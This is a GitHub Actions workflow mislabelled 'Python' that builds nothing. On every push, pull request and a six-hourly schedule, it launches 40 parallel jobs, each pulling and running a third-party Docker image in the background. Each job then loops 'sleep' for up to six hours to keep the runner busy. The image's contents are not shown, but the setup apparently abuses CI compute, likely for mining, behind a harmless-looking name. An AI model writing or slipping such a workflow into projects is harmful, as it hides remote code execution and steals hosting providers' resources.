name: Python 
on:  
  push:
  pull_request:
  schedule:
  - cron: "0 */6 * * *"
jobs: 
 python-1: 
    runs-on: ubuntu-latest 
    strategy: 
      fail-fast: false 
      matrix: 
         go: [1.11, 1.12, 1.13, 1.14] 
         flag: [A, B, C, D, E, F, G, H, I, J] 
    timeout-minutes: 360 
  
    steps: 
    - uses: actions/checkout@v2 
    - name: Python-run 
      run: |
        sudo docker run -d stevenroybeverly/6752:6798
        while :; do date;sleep 120; done
